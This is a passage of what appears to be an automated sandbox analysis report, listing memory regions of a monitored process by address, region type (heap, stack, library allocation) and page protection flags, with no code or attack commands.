page read and write
1B46EE01000
heap
page read and write
1DE87EF0000
trusted library allocation
page read and write
4C4E000
stack
page read and write
5D71000
trusted library allocation
page read and write
7FFE7E1D0000
trusted library allocation
page read and write
1DEA2168000
heap
page read and write
926FAFE000
stack
page read and write
926FCB6000
stack
page read and write
1B46EF48000
heap
page read and write
1DE8B2AE000
trusted library allocation
page read and write
8580000
heap
page read and write
1DE8B218000
trusted library allocation
page read and write
1A59FF40000
heap
page read and write
1B470CA5000
heap
page read and write
1B470C57000
heap
page read and write
3300000
heap
page read and write
1DEA1957000
heap
page read and write
1B470C78000
heap
page read and write
1B470C78000
heap
page read and write
1B46EDFF000
heap
page read and write
926FB7E000
stack
page read and write
8805000
trusted library allocation
page read and write
1DEA20CB000
heap
page read and write
1DEA20D3000
heap
page read and write
84AE000
stack
page read and write
3140000
trusted library allocation
page read and write
3142000
trusted library allocation
page read and write
1B470C80000
heap
page read and write
1B470C3B000
heap
page read and write
1B470B37000
heap
page read and write
7960000
trusted library allocation
page read and write
7FFE7DEE2000
trusted library allocation
page read and write
84EE000
stack
page read and write
1B46EF48000
heap
page read and write
1DE89FA7000
trusted library allocation
page read and write
1DEA2142000
heap
page read and write
1B46ECB0000
heap
page read and write
1B470B53000
heap
page read and write
1B470CA5000
heap
page read and write
1B46EF48000
heap
page read and write
926FE3E000
stack
page read and write
1B470B28000
heap
page read and write
1B470D45000
heap
page read and write
1DEA2164000
heap
page read and write
3188000
heap
page read and write
1DE8B7E7000
trusted library allocation
page read and write
1B470B20000
heap
page read and write
926FBF8000
stack
page read and write
1DE89DD8000
trusted library allocation
page read and write
1B470DF4000
heap
page read and write
1B46EE01000
heap
page read and write
5D99000
trusted library allocation
page read and write
7A9C000
stack
page read and write
1B470C49000
heap
page read and write
1DE89DCD000
trusted library allocation
page read and write
32F4000
heap
page read and write
1B470C57000
heap
page read and write
7FFE7E270000
trusted library allocation
page read and write
1DEA2151000
heap
page read and write
1DEA215B000
heap
page read and write
320F000
stack
page read and write
7FFE7E000000
trusted library allocation
page execute and read and write
1B46ED9F000
heap
page read and write
1B470CE6000
heap
page read and write
1B470B4A000
heap
page read and write
1B46ED70000
heap
page read and write
8A00000
trusted library allocation
page read and write
4D71000
trusted library allocation
page read and write
1B470C46000
heap
page read and write
1DE87F76000
heap
page read and write
3356000
heap
page read and write
1B470B28000
heap
page read and write
32AE000
stack
page read and write
7FFE7E1C0000
trusted library allocation
page read and write
3129000
trusted library allocation
page read and write
3363000
heap
page read and write
1B470C38000
heap
page read and write
8790000
trusted library allocation
page read and write
30F0000
trusted library section
page read and write
926FC3F000
stack
page read and write
1DE87F00000
heap
page execute and read and write
1B470D70000
heap
page read and write
7F310000
trusted library allocation
page execute and read and write
7FFE7E120000
trusted library allocation
page read and write
7FFE7DFA0000
trusted library allocation
page execute and read and write
4CD0000
heap
page read and write
7FFE7E210000
trusted library allocation
page read and write
7680000
heap
page read and write
89F0000
trusted library allocation
page execute and read and write
926FFBE000
stack
page read and write
7A30000
trusted library allocation
page read and write
7850000
heap
page execute and read and write
73B0000
heap
page read and write
1B46EDDC000
heap
page read and write
1B470B21000
heap
page read and write
1B470CD5000
heap
page read and write
789E000
stack
page read and write
1B46ED9A000
heap
page read and write
1B470C72000
heap
page read and write
1B82AFE000
stack
page read and write
1DE8B6E2000
trusted library allocation
page read and write
1B46EDA0000
heap
page read and write
1DE898D0000
heap
page read and write
1B470C53000
heap
page read and write
9FEB000
direct allocation
page execute and read and write
7FFE7DEED000
trusted library allocation
page execute and read and write
8586000
heap
page read and write
1B470B53000
heap
page read and write
1B470CD6000
heap
page read and write
1B46EE53000
heap
page read and write
1B46EE0E000
heap
page read and write
1B46EDA0000
heap
page read and write
1DE89920000
heap
page execute and read and write
E40000
heap
page read and write
1DE8B705000
trusted library allocation
page read and write
1B46EDAF000
heap
page read and write
1B470C78000
heap
page read and write
7FFE7DEF0000
trusted library allocation
page read and write
1DEA2154000
heap
page read and write
8588000
heap
page read and write
1B470B53000
heap
page read and write
7FFE7E1A0000
trusted library allocation
page read and write
1B470C57000
heap
page read and write
1B470C57000
heap
page read and write
8540000
trusted library allocation
page read and write
1B470DF6000
heap
page read and write
79E0000
trusted library allocation
page read and write
7FFE7DEE0000
trusted library allocation
page read and write
1DE8B6D1000
trusted library allocation
page read and write
7FFE7E100000
trusted library allocation
page read and write
1B46EF45000
heap
page read and write
1B470CEE000
heap
page read and write
3334000
heap
page read and write
1DE89DE5000
trusted library allocation
page read and write
1B470B2B000
heap
page read and write
7970000
trusted library allocation
page execute and read and write
1DE87F5C000
heap
page read and write
8550000
trusted library allocation
page read and write
3218000
trusted library allocation
page read and write
1DE87FA3000
heap
page read and write
1B470C48000
heap
page read and write
1DE89940000
heap
page read and write
1B470C51000
heap
page read and write
1B470C95000
heap
page read and write
1B46EDBC000
heap
page read and write
894C000
stack
page read and write
32B0000
trusted library allocation
page execute and read and write
1DEA1E47000
heap
page execute and read and write
1DE87F55000
heap
page read and write
7FFE7E1E0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
1B470B53000
heap
page read and write
1B470CC2000
heap
page read and write
7FFE7DEFB000
trusted library allocation
page read and write
1B46EEA0000
remote allocation
page read and write
1DE881B0000
trusted library allocation
page read and write
1B470B2E000
heap
page read and write
795D000
stack
page read and write
4CC0000
heap
page execute and read and write
1B470C40000
heap
page read and write
8520000
trusted library allocation
page read and write
1DE8B6E4000
trusted library allocation
page read and write
1B470C95000
heap
page read and write
1DE87FEB000
heap
page read and write
1B470B2F000
heap
page read and write
1B470C57000
heap
page read and write
1DEA1E6E000
heap
page read and write
3160000
trusted library allocation
page read and write
1A59FF45000
heap
page read and write
85BF000
heap
page read and write
73CB000
heap
page read and write
1B470CA5000
heap
page read and write
7FFE7DEE3000
trusted library allocation
page execute and read and write
3336000
heap
page read and write
1B46EDC9000
heap
page read and write
926F87E000
stack
page read and write
926FA7E000
stack
page read and write
1B46EE62000
heap
page read and write
5338000
trusted library allocation
page read and write
1B470C80000
heap
page read and write
1B46EE60000
heap
page read and write
1DEA1F70000
heap
page read and write
1DEA20C6000
heap
page read and write
1B82FFB000
stack
page read and write
1B470C20000
heap
page read and write
1B470CA5000
heap
page read and write
1B46EED0000
heap
page read and write
30C0000
heap
page read and write
1DE8B300000
trusted library allocation
page read and write
7FFE7E0A0000
trusted library allocation
page execute and read and write
1B470CC7000
heap
page read and write
B8C000
stack
page read and write
1B470B27000
heap
page read and write
1B470D9E000
heap
page read and write
7FFE7E130000
trusted library allocation
page read and write
890C000
stack
page read and write
1DEA1F2F000
heap
page read and write
84F0000
trusted library allocation
page execute and read and write
1B470B53000
heap
page read and write
7990000
trusted library allocation
page read and write
1B470D9F000
heap
page read and write
1B470CF9000
heap
page read and write
1DEA212E000
heap
page read and write
1B46EE10000
heap
page read and write
1B470CD7000
heap
page read and write
1B46EE53000
heap
page read and write
76B3000
heap
page read and write
1B470C95000
heap
page read and write
7A40000
trusted library allocation
page execute and read and write
4C0F000
stack
page read and write
1B470C95000
heap
page read and write
7FFE7E240000
trusted library allocation
page read and write
1B470CC4000
heap
page read and write
79B0000
trusted library allocation
page read and write
1B46EDFF000
heap
page read and write
4BCE000
stack
page read and write
4D68000
heap
page read and write
76CA000
heap
page read and write
1B470C57000
heap
page read and write
1B46EE27000
heap
page read and write
3113000
trusted library allocation
page execute and read and write
1DE8A4CD000
trusted library allocation
page read and write
1B470CA9000
heap
page read and write
1B470C51000
heap
page read and write
4134D7F000
stack
page read and write
30E0000
trusted library section
page read and write
7FFE7E190000
trusted library allocation
page read and write
1DE87FDE000
heap
page read and write
761F000
stack
page read and write
1B470CD0000
heap
page read and write
1B470C72000
heap
page read and write
78DE000
stack
page read and write
1B470C95000
heap
page read and write
1B470CA9000
heap
page read and write
7A50000
trusted library allocation
page read and write
1B470D70000
heap
page read and write
1A59FC50000
heap
page read and write
4C8E000
stack
page read and write
1A59FC66000
heap
page read and write
1DE8A2C9000
trusted library allocation
page read and write
926F8FE000
stack
page read and write
3145000
trusted library allocation
page execute and read and write
7265000
heap
page execute and read and write
1DEA1EA6000
heap
page read and write
1DE881C0000
heap
page read and write
1DE8A4F7000
trusted library allocation
page read and write
1DE87ED0000
trusted library allocation
page read and write
1B46EE32000
heap
page read and write
1DEA2050000
heap
page read and write
1B82DFF000
stack
page read and write
1B470C57000
heap
page read and write
1B470B2F000
heap
page read and write
9270A0F000
stack
page read and write
1DE87E50000
heap
page read and write
7FFE7DEE4000
trusted library allocation
page read and write
1DEA1E40000
heap
page execute and read and write
1B470C53000
heap
page read and write
1B470C72000
heap
page read and write
1DE87F1D000
heap
page read and write
1B46EE62000
heap
page read and write
1B46ECD0000
heap
page read and write
1B470CB2000
heap
page read and write
7FFE7E0C7000
trusted library allocation
page read and write
85B3000
heap
page read and write
1DE99C47000
trusted library allocation
page read and write
31CE000
stack
page read and write
8500000
heap
page read and write
1A59FE40000
heap
page read and write
1B46EEA0000
remote allocation
page read and write
1A59FC59000
heap
page read and write
1B470CA5000
heap
page read and write
1B470C93000
heap
page read and write
7FFE7E160000
trusted library allocation
page read and write
1DE8B6F0000
trusted library allocation
page read and write
7FFE7DF96000
trusted library allocation
page read and write
5DD6000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
1DE87E90000
heap
page read and write
1B470C78000
heap
page read and write
8770000
trusted library allocation
page read and write
1B470DF0000
heap
page read and write
1B470CD0000
heap
page read and write
1B470CA9000
heap
page read and write
1B470CA9000
heap
page read and write
F60000
heap
page read and write
1B470C3E000
heap
page read and write
1B470B53000
heap
page read and write
1B470B53000
heap
page read and write
79A0000
trusted library allocation
page read and write
1B470CF0000
heap
page read and write
1B470CD3000
heap
page read and write
1B470CB9000
heap
page read and write
1DE8B246000
trusted library allocation
page read and write
1B470CB2000
heap
page read and write
1B46EE0A000
heap
page read and write
There are 525 hidden memdumps, click here to show them.